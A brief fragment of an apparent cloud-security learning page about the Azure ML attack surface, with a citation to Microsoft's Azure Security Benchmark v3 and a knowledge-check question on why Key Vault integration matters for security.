"Azure Security Benchmark v3" - Microsoft (2023) - Cross-service security controls applicable to Azure ML

Knowledge Check

What makes Azure ML's Key Vault integration a significant attack surface?

Edit this page on GitHub

Azure ML Attack Surface

Related articles

Azure ML Attack Surface

Related articles